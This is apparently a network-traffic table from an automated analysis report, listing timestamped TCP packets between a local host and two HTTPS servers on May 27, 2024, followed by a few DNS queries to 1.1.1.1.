        May 27, 2024 15:21:09.301289082 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301311970 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301317930 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301347017 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301358938 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301455975 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301497936 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301521063 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301527977 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301558971 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301573038 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301697016 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301736116 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301770926 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301776886 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.301805973 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.301820993 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.380976915 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.381033897 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.381217957 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.381217957 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.381283998 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.381325960 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.381347895 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.381373882 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.381407022 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.381423950 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.381428003 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.381448030 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.381484032 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.381513119 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.382810116 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.382859945 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.382900000 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.382908106 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.382940054 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.382956028 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.389969110 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.390012026 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.390048027 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.390054941 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.390088081 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.390111923 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.390697002 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.390738964 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.390769005 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.390775919 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.390805960 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.390816927 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391201019 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391244888 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391271114 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391277075 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391304970 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391319990 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391480923 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391522884 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391546011 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391552925 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391582012 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391590118 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391675949 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391721010 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391742945 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391750097 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.391777992 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.391786098 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.471484900 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.471549034 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.471635103 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.471649885 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.471672058 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.471693993 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.471968889 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.472009897 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.472038984 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.472045898 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.472069979 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.472078085 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.473292112 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.473357916 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.473376036 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.473383904 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.473418951 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.473418951 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.481713057 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.481759071 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.481794119 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.481801033 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.481829882 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.481839895 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482042074 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482084036 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482111931 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482119083 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482145071 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482187986 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482302904 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482342958 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482369900 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482377052 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482403994 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482417107 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482578993 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482620001 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482649088 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482656956 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482683897 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482697964 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482810974 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482852936 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482877970 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482883930 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.482911110 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.482928991 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.561995983 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.562058926 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.562222004 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.562222004 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.562247038 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.562303066 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.562567949 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.562614918 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.562643051 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.562650919 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.562676907 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.562693119 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.563920021 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.563966036 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.563992023 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.563998938 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.564024925 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.564044952 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.571213007 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.571253061 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.571278095 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.571285009 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.571310043 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.571326971 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.571877003 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.571918964 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.571957111 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.571963072 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.571993113 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572011948 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572256088 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572299004 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572329998 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572336912 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572366953 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572386980 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572550058 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572587967 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572621107 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572627068 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572658062 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572679043 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572782040 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572823048 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572853088 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572860003 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.572896004 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.572915077 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.657618999 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.657668114 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.657758951 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.657788038 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.657805920 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.657841921 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.658029079 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.658068895 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.658097982 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.658104897 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.658122063 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.658148050 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.662139893 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.662183046 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.662209034 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.662215948 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.662242889 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.662257910 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.663880110 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.663922071 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.663948059 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.663954973 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.663975954 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.664017916 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667273998 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667315006 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667349100 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667356014 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667386055 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667399883 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667562962 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667602062 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667629957 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667637110 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667666912 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667685032 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667824030 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667865038 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667895079 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667901993 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.667929888 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.667952061 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.668061018 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.668114901 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.668139935 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.668147087 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.668170929 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.668189049 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.746370077 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.746398926 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.746679068 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.746742964 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.746779919 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.746800900 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.746830940 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.746850014 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.746881962 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.746902943 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.751079082 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.751096010 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.751157999 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.751166105 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.751210928 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.753176928 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.753192902 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.753248930 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.753254890 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.753295898 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.757720947 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.757736921 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.757796049 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.757802963 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.757843971 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.758363962 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758378983 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758428097 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.758434057 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758483887 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.758547068 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758563042 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758615971 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.758621931 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758663893 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.758779049 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758795023 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758848906 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.758855104 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.758894920 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847351074 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847413063 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847476959 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847500086 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847513914 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847547054 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847558975 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847600937 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847620964 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847628117 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847656012 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847676039 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847702980 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847747087 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847764969 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847773075 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.847800970 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.847820044 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.849778891 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.849823952 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.849858046 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.849864960 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.849889994 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.849909067 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.849996090 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850037098 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850071907 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850078106 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850107908 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850127935 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850217104 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850228071 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850291967 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850298882 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850338936 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850409031 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850492954 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850502014 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850533009 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850560904 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850578070 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850704908 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850749016 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850773096 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850779057 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.850804090 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.850824118 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.932611942 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.932637930 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.932724953 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.932734013 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.932775974 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.932811022 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.932826042 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.932877064 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.932883024 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.932921886 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.934065104 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.934079885 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.934130907 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.934137106 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.934227943 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.934227943 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.937292099 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.937305927 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.937377930 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.937385082 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.937433004 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.939359903 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.939378023 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.939434052 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.939440012 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.939490080 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.939861059 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.939878941 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.939933062 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.939939022 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.939985037 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.940239906 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.940257072 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.940299988 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.940305948 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.940419912 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.940596104 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.940613985 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.940675020 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:09.940681934 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:09.940722942 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:10.023693085 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:10.023758888 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:10.023799896 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:10.023807049 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:10.023838997 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:10.023858070 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:10.023907900 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:10.024115086 CEST44349706188.114.97.3192.168.2.5
        May 27, 2024 15:21:10.024154902 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:10.024195910 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:10.024591923 CEST49706443192.168.2.5188.114.97.3
        May 27, 2024 15:21:16.286978960 CEST49708443192.168.2.5162.159.135.233
        May 27, 2024 15:21:16.287048101 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.287142992 CEST49708443192.168.2.5162.159.135.233
        May 27, 2024 15:21:16.287416935 CEST49708443192.168.2.5162.159.135.233
        May 27, 2024 15:21:16.287447929 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.754095078 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.754198074 CEST49708443192.168.2.5162.159.135.233
        May 27, 2024 15:21:16.756072044 CEST49708443192.168.2.5162.159.135.233
        May 27, 2024 15:21:16.756117105 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.756385088 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.757498026 CEST49708443192.168.2.5162.159.135.233
        May 27, 2024 15:21:16.802499056 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.896452904 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.896606922 CEST44349708162.159.135.233192.168.2.5
        May 27, 2024 15:21:16.896668911 CEST49708443192.168.2.5162.159.135.233
        May 27, 2024 15:21:16.903630018 CEST49708443192.168.2.5162.159.135.233
        TimestampSource PortDest PortSource IPDest IP
        May 27, 2024 15:20:58.441070080 CEST5115653192.168.2.51.1.1.1
        May 27, 2024 15:20:58.451663971 CEST53511561.1.1.1192.168.2.5
        May 27, 2024 15:21:01.940035105 CEST6012853192.168.2.51.1.1.1
        May 27, 2024 15:21:01.992952108 CEST53601281.1.1.1192.168.2.5
        May 27, 2024 15:21:16.275051117 CEST5097153192.168.2.51.1.1.1
        May 27, 2024 15:21:16.286309958 CEST53509711.1.1.1192.168.2.5
        May 27, 2024 15:21:33.356178045 CEST5352788162.159.36.2192.168.2.5
        May 27, 2024 15:21:33.885876894 CEST5022053192.168.2.51.1.1.1
